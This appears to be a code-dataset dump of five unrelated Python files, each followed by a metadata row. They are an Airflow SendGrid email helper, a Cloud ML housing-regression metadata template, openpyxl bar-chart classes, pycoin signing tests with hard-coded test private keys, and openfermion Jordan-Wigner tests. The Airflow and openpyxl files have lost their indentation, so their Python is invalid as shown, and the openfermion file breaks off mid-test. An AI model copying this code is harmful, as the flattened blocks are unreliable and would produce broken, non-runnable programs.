from airflow.utils.email import get_email_address_list
log = logging.getLogger(__name__)
AddressesType = Union[str, Iterable[str]]
def send_email(
to: AddressesType,
subject: str,
html_content: str,
files: Optional[AddressesType] = None,
cc: Optional[AddressesType] = None,
bcc: Optional[AddressesType] = None,
sandbox_mode: bool = False,
**kwargs,
) -> None:
"""
Send an email with html content using `Sendgrid <https://sendgrid.com/>`__.
.. note::
For more information, see :ref:`email-configuration-sendgrid`
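    A minimal usage sketch, assuming ``SENDGRID_API_KEY`` and
    ``SENDGRID_MAIL_FROM`` are set in the environment::
        send_email('user@example.com', 'Example subject', '<b>Hello</b>')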
"""
if files is None:
files = []
mail = Mail()
from_email = kwargs.get('from_email') or os.environ.get('SENDGRID_MAIL_FROM')
from_name = kwargs.get('from_name') or os.environ.get('SENDGRID_MAIL_SENDER')
mail.from_email = Email(from_email, from_name)
mail.subject = subject
mail.mail_settings = MailSettings()
if sandbox_mode:
mail.mail_settings.sandbox_mode = SandBoxMode(enable=True)
    # Add the recipients from the ``to`` list.
personalization = Personalization()
to = get_email_address_list(to)
for to_address in to:
personalization.add_to(Email(to_address))
if cc:
cc = get_email_address_list(cc)
for cc_address in cc:
personalization.add_cc(Email(cc_address))
if bcc:
bcc = get_email_address_list(bcc)
for bcc_address in bcc:
personalization.add_bcc(Email(bcc_address))
# Add custom_args to personalization if present
pers_custom_args = kwargs.get('personalization_custom_args', None)
if isinstance(pers_custom_args, dict):
for key in pers_custom_args.keys():
personalization.add_custom_arg(CustomArg(key, pers_custom_args[key]))
mail.add_personalization(personalization)
mail.add_content(Content('text/html', html_content))
categories = kwargs.get('categories', [])
for cat in categories:
mail.add_category(Category(cat))
# Add email attachment.
for fname in files:
basename = os.path.basename(fname)
with open(fname, "rb") as file:
content = base64.b64encode(file.read()).decode('utf-8')
attachment = Attachment(
file_content=content,
file_type=mimetypes.guess_type(basename)[0],
file_name=basename,
disposition="attachment",
content_id=f"<{basename}>",
)
mail.add_attachment(attachment)
_post_sendgrid_mail(mail.get())
def _post_sendgrid_mail(mail_data: Dict) -> None:
sendgrid_client = sendgrid.SendGridAPIClient(api_key=os.environ.get('SENDGRID_API_KEY'))
response = sendgrid_client.client.mail.send.post(request_body=mail_data)
# 2xx status code.
if 200 <= response.status_code < 300:
log.info(
'Email with subject %s is successfully sent to recipients: %s',
mail_data['subject'],
mail_data['personalizations'],
)
else:
log.error(
'Failed to send out email with subject %s, status code: %s',
mail_data['subject'],
response.status_code,
)
| 30.964029 | 92 | 0.681227 | [
"Apache-2.0"
] | AI-ML-Projects/airflow | airflow/providers/sendgrid/utils/emailer.py | 4,304 | Python |
#!/usr/bin/env python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ************************************************************************
# YOU NEED TO MODIFY THE META DATA TO ADAPT THE TRAINER TEMPLATE YOUR DATA
# ************************************************************************
# task type can be either 'classification' or 'regression', based on the target feature in the dataset
TASK_TYPE = 'regression'
# list of all the columns (header) of the input data file(s)
HEADER = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT', 'MEDV']
# list of the default values of all the columns of the input data, to help decoding the data types of the columns
HEADER_DEFAULTS = [[0.0], [0.0], [0.0], [0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0]]
# list of the feature names of type int or float
INPUT_NUMERIC_FEATURE_NAMES = ['CRIM', 'ZN', 'INDUS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT']
# numeric features constructed, if any, in process_features function in input.py module,
# as part of reading data
CONSTRUCTED_NUMERIC_FEATURE_NAMES = []
# a dictionary of feature names with int values, but to be treated as categorical features.
# In the dictionary, the key is the feature name, and the value is the num_buckets (count of distinct values)
INPUT_CATEGORICAL_FEATURE_NAMES_WITH_IDENTITY = {'CHAS': 2}
# categorical features with identity constructed, if any, in process_features function in input.py module,
# as part of reading data. Usually include constructed boolean flags
CONSTRUCTED_CATEGORICAL_FEATURE_NAMES_WITH_IDENTITY = {}
# a dictionary of categorical features with few nominal values (to be encoded as one-hot indicators)
# In the dictionary, the key is the feature name, and the value is the list of feature vocabulary
INPUT_CATEGORICAL_FEATURE_NAMES_WITH_VOCABULARY = {}
# a dictionary of categorical features with many values (sparse features)
# In the dictionary, the key is the feature name, and the value is the bucket size
INPUT_CATEGORICAL_FEATURE_NAMES_WITH_HASH_BUCKET = {}
# list of all the categorical feature names
INPUT_CATEGORICAL_FEATURE_NAMES = list(INPUT_CATEGORICAL_FEATURE_NAMES_WITH_IDENTITY.keys()) \
+ list(INPUT_CATEGORICAL_FEATURE_NAMES_WITH_VOCABULARY.keys()) \
                                  + list(INPUT_CATEGORICAL_FEATURE_NAMES_WITH_HASH_BUCKET.keys())
# list of all the input feature names to be used in the model
INPUT_FEATURE_NAMES = INPUT_NUMERIC_FEATURE_NAMES + INPUT_CATEGORICAL_FEATURE_NAMES
# the column include the weight of each record
WEIGHT_COLUMN_NAME = None
# target feature name (response or class variable)
TARGET_NAME = 'MEDV'
# list of the columns expected during serving (which probably different than the header of the training data)
SERVING_COLUMNS = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT']
# list of the default values of all the columns of the serving data, to help decoding the data types of the columns
SERVING_DEFAULTS = [[0.0], [0.0], [0.0], [0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0]]
| 52.194444 | 119 | 0.695583 | [
"Apache-2.0"
] | 0olwzo0/cloudml-samples | cloudml-template/examples/housing-regression/trainer/metadata.py | 3,758 | Python |
# Copyright (c) 2010-2020 openpyxl
from openpyxl.descriptors.serialisable import Serialisable
from openpyxl.descriptors import (
Typed,
Bool,
Integer,
Sequence,
Alias,
)
from openpyxl.descriptors.excel import ExtensionList
from openpyxl.descriptors.nested import (
NestedNoneSet,
NestedSet,
NestedBool,
NestedInteger,
NestedMinMax,
)
from .descriptors import (
NestedGapAmount,
NestedOverlap,
)
from ._chart import ChartBase
from ._3d import _3DBase
from .axis import TextAxis, NumericAxis, SeriesAxis, ChartLines
from .shapes import GraphicalProperties
from .series import Series
from .legend import Legend
from .label import DataLabelList
class _BarChartBase(ChartBase):
barDir = NestedSet(values=(['bar', 'col']))
type = Alias("barDir")
grouping = NestedSet(values=(['percentStacked', 'clustered', 'standard',
'stacked']))
varyColors = NestedBool(nested=True, allow_none=True)
ser = Sequence(expected_type=Series, allow_none=True)
dLbls = Typed(expected_type=DataLabelList, allow_none=True)
dataLabels = Alias("dLbls")
__elements__ = ('barDir', 'grouping', 'varyColors', 'ser', 'dLbls')
_series_type = "bar"
def __init__(self,
barDir="col",
grouping="clustered",
varyColors=None,
ser=(),
dLbls=None,
**kw
):
self.barDir = barDir
self.grouping = grouping
self.varyColors = varyColors
self.ser = ser
self.dLbls = dLbls
super(_BarChartBase, self).__init__(**kw)
class BarChart(_BarChartBase):
tagname = "barChart"
barDir = _BarChartBase.barDir
grouping = _BarChartBase.grouping
varyColors = _BarChartBase.varyColors
ser = _BarChartBase.ser
dLbls = _BarChartBase.dLbls
gapWidth = NestedGapAmount()
overlap = NestedOverlap()
serLines = Typed(expected_type=ChartLines, allow_none=True)
extLst = Typed(expected_type=ExtensionList, allow_none=True)
# chart properties actually used by containing classes
x_axis = Typed(expected_type=TextAxis)
y_axis = Typed(expected_type=NumericAxis)
__elements__ = _BarChartBase.__elements__ + ('gapWidth', 'overlap', 'serLines', 'axId')
def __init__(self,
gapWidth=150,
overlap=None,
serLines=None,
extLst=None,
**kw
):
self.gapWidth = gapWidth
self.overlap = overlap
self.serLines = serLines
self.x_axis = TextAxis()
self.y_axis = NumericAxis()
self.legend = Legend()
super(BarChart, self).__init__(**kw)
class BarChart3D(_BarChartBase, _3DBase):
tagname = "bar3DChart"
barDir = _BarChartBase.barDir
grouping = _BarChartBase.grouping
varyColors = _BarChartBase.varyColors
ser = _BarChartBase.ser
dLbls = _BarChartBase.dLbls
view3D = _3DBase.view3D
floor = _3DBase.floor
sideWall = _3DBase.sideWall
backWall = _3DBase.backWall
gapWidth = NestedGapAmount()
gapDepth = NestedGapAmount()
shape = NestedNoneSet(values=(['cone', 'coneToMax', 'box', 'cylinder', 'pyramid', 'pyramidToMax']))
serLines = Typed(expected_type=ChartLines, allow_none=True)
extLst = Typed(expected_type=ExtensionList, allow_none=True)
x_axis = Typed(expected_type=TextAxis)
y_axis = Typed(expected_type=NumericAxis)
z_axis = Typed(expected_type=SeriesAxis, allow_none=True)
__elements__ = _BarChartBase.__elements__ + ('gapWidth', 'gapDepth', 'shape', 'serLines', 'axId')
def __init__(self,
gapWidth=150,
gapDepth=150,
shape=None,
serLines=None,
extLst=None,
**kw
):
self.gapWidth = gapWidth
self.gapDepth = gapDepth
self.shape = shape
self.serLines = serLines
self.x_axis = TextAxis()
self.y_axis = NumericAxis()
self.z_axis = SeriesAxis()
super(BarChart3D, self).__init__(**kw)
| 28.793103 | 103 | 0.634251 | [
"Apache-2.0"
] | AdrianaViabL/Curso-Python-udemy | venv/lib/python3.8/site-packages/openpyxl/chart/bar_chart.py | 4,175 | Python |
import unittest
from pycoin.coins import tx_utils
from pycoin.cmds.tx import DEFAULT_VERSION
from pycoin.ecdsa.secp256k1 import secp256k1_generator
from pycoin.encoding.hexbytes import h2b
from pycoin.solve.utils import build_hash160_lookup, build_p2sh_lookup
from pycoin.symbols.btc import network
from pycoin.ui.key_from_text import key_from_text
# BRAIN DAMAGE
address_for_p2s = network.ui.address_for_p2s
script_for_address = network.ui.script_for_address
script_for_multisig = network.script_info.script_for_multisig
Spendable = network.tx.Spendable
Tx = network.tx
TxIn = network.tx.TxIn
TxOut = network.tx.TxOut
Key = network.extras.Key
class SignTest(unittest.TestCase):
def test_sign_p2sh(self):
tx_out_script = h2b("76a91491b24bf9f5288532960ac687abb035127b1d28a588ac")
script = script_for_address("1EHNa6Q4Jz2uvNExL497mE43ikXhwF6kZm")
self.assertEqual(tx_out_script, script)
tx_out = TxOut(100, tx_out_script)
tx = Tx(1, [TxIn(b'\1' * 32, 1)], [TxOut(100, tx_out_script)])
tx.set_unspents([tx_out])
hl = build_hash160_lookup([1], [secp256k1_generator])
self.assertEqual(tx.bad_solution_count(), 1)
tx.sign(hash160_lookup=hl)
self.assertEqual(tx.bad_solution_count(), 0)
def multisig_M_of_N(self, M, N, unsigned_id, signed_id):
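        # Build an M-of-N bare multisig output, spend it to the (N+1)th key's
        # address, and check the transaction id before and after signing with
        # the first M private keys.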
keys = [Key(secret_exponent=i, generator=secp256k1_generator) for i in range(1, N+2)]
tx_in = TxIn.coinbase_tx_in(script=b'')
script = script_for_multisig(m=M, sec_keys=[key.sec() for key in keys[:N]])
tx_out = TxOut(1000000, script)
tx1 = Tx(version=1, txs_in=[tx_in], txs_out=[tx_out])
tx2 = tx_utils.create_tx(tx1.tx_outs_as_spendable(), [keys[-1].address()])
self.assertEqual(tx2.id(), unsigned_id)
self.assertEqual(tx2.bad_solution_count(), 1)
hash160_lookup = build_hash160_lookup((key.secret_exponent() for key in keys[:M]), [secp256k1_generator])
tx2.sign(hash160_lookup=hash160_lookup)
self.assertEqual(tx2.id(), signed_id)
self.assertEqual(tx2.bad_solution_count(), 0)
def test_sign_multisig_1_of_2(self):
unsigned_id = "dd40f601e801ad87701b04851a4a6852d6b625e481d0fc9c3302faf613a4fc88"
signed_id = "fb9ccc00d0e30ab2648768104fd777df8f856830233232c5e43f43584aec23d9"
self.multisig_M_of_N(1, 2, unsigned_id, signed_id)
def test_sign_multisig_2_of_3(self):
unsigned_id = "6bc5614a41c7c4aa828f5a4314fff23e5e49b1137e5d31e9716eb58f6fb198ff"
signed_id = "c521962fe9d0e5efb7d0966759c57e7ee2595ce8e05cb342b19265a8722420dd"
self.multisig_M_of_N(2, 3, unsigned_id, signed_id)
def test_multisig_one_at_a_time(self):
M = 3
N = 3
keys = [Key(secret_exponent=i, generator=secp256k1_generator) for i in range(1, N+2)]
tx_in = TxIn.coinbase_tx_in(script=b'')
script = script_for_multisig(m=M, sec_keys=[key.sec() for key in keys[:N]])
tx_out = TxOut(1000000, script)
tx1 = Tx(version=1, txs_in=[tx_in], txs_out=[tx_out])
tx2 = tx_utils.create_tx(tx1.tx_outs_as_spendable(), [keys[-1].address()])
ids = ["403e5bfc59e097bb197bf77a692d158dd3a4f7affb4a1fa41072dafe7bec7058",
"5931d9995e83721243dca24772d7012afcd4378996a8b953c458175f15a544db",
"9bb4421088190bbbb5b42a9eaa9baed7ec7574a407c25f71992ba56ca43d9c44",
"03a1dc2a63f93a5cf5a7cb668658eb3fc2eda88c06dc287b85ba3e6aff751771"]
for i in range(1, N+1):
self.assertEqual(tx2.bad_solution_count(), 1)
self.assertEqual(tx2.id(), ids[i-1])
hash160_lookup = build_hash160_lookup((key.secret_exponent() for key in keys[i-1:i]), [secp256k1_generator])
tx2.sign(hash160_lookup=hash160_lookup)
self.assertEqual(tx2.id(), ids[i])
self.assertEqual(tx2.bad_solution_count(), 0)
def test_p2sh_multisig_sequential_signing(self):
raw_scripts = [h2b(
"52210234abcffd2e80ad01c2ec0276ad02682808169c6fafdd25ebfb60703df272b461"
"2102e5baaafff8094e4d77ce8b009d5ebc3de9110085ebd3d96e50cc7ce70faf175221"
"0316ee25e80eb6e6fc734d9c86fa580cbb9c4bfd94a19f0373a22353ececd4db6853ae")]
spendable = {'script_hex': 'a914c4ed4de526461e3efbb79c8b688a6f9282c0464687', 'does_seem_spent': 0,
'block_index_spent': 0, 'coin_value': 10000, 'block_index_available': 0, 'tx_out_index': 0,
'tx_hash_hex': '0ca152ba6b88db87a7ef1afd24554102aca1ab86cf2c10ccbc374472145dc943'}
key_1 = key_from_text('Kz6pytJCigYHeMsGLmfHQPJhN5og2wpeSVrU43xWwgHLCAvpsprh')
key_2 = key_from_text('Kz7NHgX7MBySA3RSKj9GexUSN6NepEDoPNugSPr5absRDoKgn2dT')
for ordered_keys in [(key_1, key_2), (key_2, key_1)]:
txs_in = [TxIn(previous_hash=h2b('43c95d14724437bccc102ccf86aba1ac02415524fd1aefa787db886bba52a10c'),
previous_index=0)]
txs_out = [TxOut(10000, script_for_address('3KeGeLFmsbmbVdeMLrWp7WYKcA3tdsB4AR'))]
unspents = [Spendable.from_dict(spendable)]
tx = Tx(version=DEFAULT_VERSION, txs_in=txs_in, txs_out=txs_out, unspents=unspents)
for key in ordered_keys:
self.assertEqual(tx.bad_solution_count(), 1)
p2sh_lookup = build_p2sh_lookup(raw_scripts)
tx.sign(build_hash160_lookup([key.secret_exponent()], [secp256k1_generator]), p2sh_lookup=p2sh_lookup)
self.assertEqual(tx.bad_solution_count(), 0)
def test_sign_pay_to_script_multisig(self):
M, N = 3, 3
keys = [Key(secret_exponent=i, generator=secp256k1_generator) for i in range(1, N+2)]
tx_in = TxIn.coinbase_tx_in(script=b'')
underlying_script = script_for_multisig(m=M, sec_keys=[key.sec() for key in keys[:N]])
address = address_for_p2s(underlying_script)
self.assertEqual(address, "39qEwuwyb2cAX38MFtrNzvq3KV9hSNov3q")
script = script_for_address(address)
tx_out = TxOut(1000000, script)
tx1 = Tx(version=1, txs_in=[tx_in], txs_out=[tx_out])
tx2 = tx_utils.create_tx(tx1.tx_outs_as_spendable(), [address])
hash160_lookup = build_hash160_lookup((key.secret_exponent() for key in keys[:N]), [secp256k1_generator])
p2sh_lookup = build_p2sh_lookup([underlying_script])
tx2.sign(hash160_lookup=hash160_lookup, p2sh_lookup=p2sh_lookup)
self.assertEqual(tx2.bad_solution_count(), 0)
def test_sign_bitcoind_partially_signed_2_of_2(self):
# Finish signing a 2 of 2 transaction, that already has one signature signed by bitcoind
# This tx can be found on testnet3 blockchain
# txid: 9618820d7037d2f32db798c92665231cd4599326f5bd99cb59d0b723be2a13a2
raw_script = ("522103e33b41f5ed67a77d4c4c54b3e946bd30d15b8f66e42cb29fde059c168851165521"
"02b92cb20a9fb1eb9656a74eeb7387636cf64cdf502ff50511830328c1b479986452ae")
p2sh_lookup = build_p2sh_lookup([h2b(raw_script)])
partially_signed_raw_tx = (
"010000000196238f11a5fd3ceef4efd5a186a7e6b9217d900418e72aca917cd6a6e634"
"e74100000000910047304402201b41b471d9dd93cf97eed7cfc39a5767a546f6bfbf3e"
"0c91ff9ad23ab9770f1f02205ce565666271d055be1f25a7e52e34cbf659f6c70770ff"
"59bd783a6fcd1be3dd0147522103e33b41f5ed67a77d4c4c54b3e946bd30d15b8f66e4"
"2cb29fde059c16885116552102b92cb20a9fb1eb9656a74eeb7387636cf64cdf502ff5"
"0511830328c1b479986452aeffffffff01a0bb0d00000000001976a9143b3beefd6f78"
"02fa8706983a76a51467bfa36f8b88ac00000000")
tx = Tx.from_hex(partially_signed_raw_tx)
tx_out = TxOut(1000000, h2b("a914a10dfa21ee8c33b028b92562f6fe04e60563d3c087"))
tx.set_unspents([tx_out])
key = key_from_text("cThRBRu2jAeshWL3sH3qbqdq9f4jDiDbd1SVz4qjTZD2xL1pdbsx")
hash160_lookup = build_hash160_lookup([key.secret_exponent()], [secp256k1_generator])
self.assertEqual(tx.bad_solution_count(), 1)
tx.sign(hash160_lookup=hash160_lookup, p2sh_lookup=p2sh_lookup)
self.assertEqual(tx.bad_solution_count(), 0)
self.assertEqual(tx.id(), "9618820d7037d2f32db798c92665231cd4599326f5bd99cb59d0b723be2a13a2")
if __name__ == "__main__":
unittest.main()
| 55.366667 | 120 | 0.725467 | [
"MIT"
] | Anappau/pycoin | tests/sign_test.py | 8,305 | Python |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests _jordan_wigner.py."""
from __future__ import absolute_import
import numpy
import unittest
from openfermion.ops import (FermionOperator,
hermitian_conjugated,
InteractionOperator,
normal_ordered,
number_operator,
QubitOperator)
from openfermion.transforms import (get_interaction_operator,
reverse_jordan_wigner)
from openfermion.transforms._jordan_wigner import (
jordan_wigner, jordan_wigner_one_body, jordan_wigner_two_body,
jordan_wigner_interaction_op)
class JordanWignerTransformTest(unittest.TestCase):
def setUp(self):
self.n_qubits = 5
def test_bad_input(self):
with self.assertRaises(TypeError):
jordan_wigner(3)
def test_transm_raise3(self):
raising = jordan_wigner(FermionOperator(((3, 1),)))
self.assertEqual(len(raising.terms), 2)
correct_operators_x = ((0, 'Z'), (1, 'Z'), (2, 'Z'), (3, 'X'))
correct_operators_y = ((0, 'Z'), (1, 'Z'), (2, 'Z'), (3, 'Y'))
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, -0.5j)
self.assertEqual(raising.terms[correct_operators_x], 0.5)
self.assertEqual(raising.terms[correct_operators_y], -0.5j)
self.assertTrue(raising.isclose(qtermx + qtermy))
def test_transm_raise1(self):
raising = jordan_wigner(FermionOperator(((1, 1),)))
correct_operators_x = ((0, 'Z'), (1, 'X'))
correct_operators_y = ((0, 'Z'), (1, 'Y'))
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, -0.5j)
self.assertEqual(raising.terms[correct_operators_x], 0.5)
self.assertEqual(raising.terms[correct_operators_y], -0.5j)
self.assertTrue(raising.isclose(qtermx + qtermy))
def test_transm_lower3(self):
lowering = jordan_wigner(FermionOperator(((3, 0),)))
correct_operators_x = ((0, 'Z'), (1, 'Z'), (2, 'Z'), (3, 'X'))
correct_operators_y = ((0, 'Z'), (1, 'Z'), (2, 'Z'), (3, 'Y'))
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, 0.5j)
self.assertEqual(lowering.terms[correct_operators_x], 0.5)
self.assertEqual(lowering.terms[correct_operators_y], 0.5j)
self.assertTrue(lowering.isclose(qtermx + qtermy))
def test_transm_lower2(self):
lowering = jordan_wigner(FermionOperator(((2, 0),)))
correct_operators_x = ((0, 'Z'), (1, 'Z'), (2, 'X'))
correct_operators_y = ((0, 'Z'), (1, 'Z'), (2, 'Y'))
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, 0.5j)
self.assertEqual(lowering.terms[correct_operators_x], 0.5)
self.assertEqual(lowering.terms[correct_operators_y], 0.5j)
self.assertTrue(lowering.isclose(qtermx + qtermy))
def test_transm_lower1(self):
lowering = jordan_wigner(FermionOperator(((1, 0),)))
correct_operators_x = ((0, 'Z'), (1, 'X'))
correct_operators_y = ((0, 'Z'), (1, 'Y'))
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, 0.5j)
self.assertEqual(lowering.terms[correct_operators_x], 0.5)
self.assertEqual(lowering.terms[correct_operators_y], 0.5j)
self.assertTrue(lowering.isclose(qtermx + qtermy))
def test_transm_lower0(self):
lowering = jordan_wigner(FermionOperator(((0, 0),)))
correct_operators_x = ((0, 'X'),)
correct_operators_y = ((0, 'Y'),)
qtermx = QubitOperator(correct_operators_x, 0.5)
qtermy = QubitOperator(correct_operators_y, 0.5j)
self.assertEqual(lowering.terms[correct_operators_x], 0.5)
self.assertEqual(lowering.terms[correct_operators_y], 0.5j)
self.assertTrue(lowering.isclose(qtermx + qtermy))
def test_transm_raise3lower0(self):
# recall that creation gets -1j on Y and annihilation gets +1j on Y.
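        # (Under Jordan-Wigner, a_p^dagger -> Z_0 ... Z_{p-1} (X_p - i Y_p) / 2 and
        #  a_p -> Z_0 ... Z_{p-1} (X_p + i Y_p) / 2, which is where these signs come from.)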
term = jordan_wigner(FermionOperator(((3, 1), (0, 0))))
self.assertEqual(term.terms[((0, 'X'), (1, 'Z'), (2, 'Z'), (3, 'Y'))],
0.25 * 1 * -1j)
self.assertEqual(term.terms[((0, 'Y'), (1, 'Z'), (2, 'Z'), (3, 'Y'))],
0.25 * 1j * -1j)
self.assertEqual(term.terms[((0, 'Y'), (1, 'Z'), (2, 'Z'), (3, 'X'))],
0.25 * 1j * 1)
self.assertEqual(term.terms[((0, 'X'), (1, 'Z'), (2, 'Z'), (3, 'X'))],
0.25 * 1 * 1)
def test_transm_number(self):
n = number_operator(self.n_qubits, 3)
n_jw = jordan_wigner(n)
self.assertEqual(n_jw.terms[((3, 'Z'),)], -0.5)
self.assertEqual(n_jw.terms[()], 0.5)
self.assertEqual(len(n_jw.terms), 2)
def test_ccr_offsite_even_ca(self):
c2 = FermionOperator(((2, 1),))
a4 = FermionOperator(((4, 0),))
self.assertTrue(normal_ordered(c2 * a4).isclose(
normal_ordered(-a4 * c2)))
self.assertTrue(jordan_wigner(c2 * a4).isclose(
jordan_wigner(-a4 * c2)))
def test_ccr_offsite_odd_ca(self):
c1 = FermionOperator(((1, 1),))
a4 = FermionOperator(((4, 0),))
self.assertTrue(normal_ordered(c1 * a4).isclose(
normal_ordered(-a4 * c1)))
self.assertTrue(jordan_wigner(c1 * a4).isclose(
jordan_wigner(-a4 * c1)))
def test_ccr_offsite_even_cc(self):
c2 = FermionOperator(((2, 1),))
c4 = FermionOperator(((4, 1),))
self.assertTrue(normal_ordered(c2 * c4).isclose(
normal_ordered(-c4 * c2)))
self.assertTrue(jordan_wigner(c2 * c4).isclose(
jordan_wigner(-c4 * c2)))
def test_ccr_offsite_odd_cc(self):
c1 = FermionOperator(((1, 1),))
c4 = FermionOperator(((4, 1),))
self.assertTrue(normal_ordered(c1 * c4).isclose(
normal_ordered(-c4 * c1)))
self.assertTrue(jordan_wigner(c1 * c4).isclose(
jordan_wigner(-c4 * c1)))
def test_ccr_offsite_even_aa(self):
a2 = FermionOperator(((2, 0),))
a4 = FermionOperator(((4, 0),))
self.assertTrue(normal_ordered(a2 * a4).isclose(
normal_ordered(-a4 * a2)))
self.assertTrue(jordan_wigner(a2 * a4).isclose(
jordan_wigner(-a4 * a2)))
def test_ccr_offsite_odd_aa(self):
a1 = FermionOperator(((1, 0),))
a4 = FermionOperator(((4, 0),))
self.assertTrue(normal_ordered(a1 * a4).isclose(
normal_ordered(-a4 * a1)))
self.assertTrue(jordan_wigner(a1 * a4).isclose(
jordan_wigner(-a4 * a1)))
def test_ccr_onsite(self):
c1 = FermionOperator(((1, 1),))
a1 = hermitian_conjugated(c1)
self.assertTrue(normal_ordered(c1 * a1).isclose(
FermionOperator(()) - normal_ordered(a1 * c1)))
self.assertTrue(jordan_wigner(c1 * a1).isclose(
QubitOperator(()) - jordan_wigner(a1 * c1)))
def test_jordan_wigner_transm_op(self):
n = number_operator(self.n_qubits)
n_jw = jordan_wigner(n)
self.assertEqual(self.n_qubits + 1, len(n_jw.terms))
self.assertEqual(self.n_qubits / 2., n_jw.terms[()])
for qubit in range(self.n_qubits):
operators = ((qubit, 'Z'),)
self.assertEqual(n_jw.terms[operators], -0.5)
class InteractionOperatorsJWTest(unittest.TestCase):
def setUp(self):
self.n_qubits = 5
self.constant = 0.
self.one_body = numpy.zeros((self.n_qubits, self.n_qubits), float)
self.two_body = numpy.zeros((self.n_qubits, self.n_qubits,
self.n_qubits, self.n_qubits), float)
self.interaction_operator = InteractionOperator(self.constant,
self.one_body,
self.two_body)
def test_jordan_wigner_one_body(self):
# Make sure it agrees with jordan_wigner(FermionTerm).
for p in range(self.n_qubits):
for q in range(self.n_qubits):
# Get test qubit operator.
test_operator = jordan_wigner_one_body(p, q)
# Get correct qubit operator.
fermion_term = FermionOperator(((p, 1), (q, 0)))
correct_op = jordan_wigner(fermion_term)
hermitian_conjugate = hermitian_conjugated(fermion_term)
if not fermion_term.isclose(hermitian_conjugate):
correct_op += jordan_wigner(hermitian_conjugate)
self.assertTrue(test_operator.isclose(correct_op))
def test_jordan_wigner_two_body(self):
# Make sure it agrees with jordan_wigner(FermionTerm).
for p in range(self.n_qubits):
for q in range(self.n_qubits):
for r in range(self.n_qubits):
for s in range(self.n_qubits):
# Get test qubit operator.
test_operator = jordan_wigner_two_body(p, q, r, s)
# Get correct qubit operator.
fermion_term = FermionOperator(((p, 1), (q, 1),
(r, 0), (s, 0)))
correct_op = jordan_wigner(fermion_term)
hermitian_conjugate = hermitian_conjugated(
fermion_term)
if not fermion_term.isclose(hermitian_conjugate):
                            if not (p == r and q == s):
                                correct_op += jordan_wigner(
                                    hermitian_conjugate)
self.assertTrue(test_operator.isclose(correct_op),
str(test_operator - correct_op))
def test_jordan_wigner_twobody_interaction_op_allunique(self):
test_op = FermionOperator('1^ 2^ 3 4')
test_op += hermitian_conjugated(test_op)
retransformed_test_op = reverse_jordan_wigner(jordan_wigner(
get_interaction_operator(test_op)))
self.assertTrue(normal_ordered(retransformed_test_op).isclose(
normal_ordered(test_op)))
def test_jordan_wigner_twobody_interaction_op_reversal_symmetric(self):
test_op = FermionOperator('1^ 2^ 2 1')
test_op += hermitian_conjugated(test_op)
self.assertTrue(jordan_wigner(test_op).isclose(
jordan_wigner(get_interaction_operator(test_op))))
def test_jordan_wigner_interaction_op_too_few_n_qubits(self):
with self.assertRaises(ValueError):
jordan_wigner_interaction_op(self.interaction_operator,
self.n_qubits - 2)
def test_jordan_wigner_interaction_op_with_zero_term(self):
test_op = FermionOperator('1^ 2^ 3 4')
test_op += hermitian_conjugated(test_op)
interaction_op = get_interaction_operator(test_op)
interaction_op.constant = 0.0
retransformed_test_op = reverse_jordan_wigner(jordan_wigner(
interaction_op))
class GetInteractionOperatorTest(unittest.TestCase):
def setUp(self):
self.n_qubits = 5
self.constant = 0.
self.one_body = numpy.zeros((self.n_qubits, self.n_qubits), float)
self.two_body = numpy.zeros((self.n_qubits, self.n_qubits,
self.n_qubits, self.n_qubits), float)
def test_get_interaction_operator_identity(self):
interaction_operator = InteractionOperator(-2j, self.one_body,
self.two_body)
qubit_operator = jordan_wigner(interaction_operator)
self.assertTrue(qubit_operator.isclose(-2j * QubitOperator(())))
self.assertEqual(interaction_operator,
get_interaction_operator(reverse_jordan_wigner(
qubit_operator), self.n_qubits))
def test_get_interaction_operator_one_body(self):
interaction_operator = get_interaction_operator(
FermionOperator('2^ 2'), self.n_qubits)
one_body = numpy.zeros((self.n_qubits, self.n_qubits), float)
one_body[2, 2] = 1.
self.assertEqual(interaction_operator,
InteractionOperator(0.0, one_body, self.two_body))
def test_get_interaction_operator_one_body_twoterm(self):
interaction_operator = get_interaction_operator(
FermionOperator('2^ 3', -2j) + FermionOperator('3^ 2', 3j),
self.n_qubits)
one_body = numpy.zeros((self.n_qubits, self.n_qubits), complex)
one_body[2, 3] = -2j
one_body[3, 2] = 3j
self.assertEqual(interaction_operator,
InteractionOperator(0.0, one_body, self.two_body))
def test_get_interaction_operator_two_body(self):
interaction_operator = get_interaction_operator(
FermionOperator('2^ 2 3^ 4'), self.n_qubits)
two_body = numpy.zeros((self.n_qubits, self.n_qubits,
self.n_qubits, self.n_qubits), float)
two_body[3, 2, 4, 2] = -1.
self.assertEqual(interaction_operator,
InteractionOperator(0.0, self.one_body, two_body))
def test_get_interaction_operator_two_body_distinct(self):
interaction_operator = get_interaction_operator(
FermionOperator('0^ 1^ 2 3'), self.n_qubits)
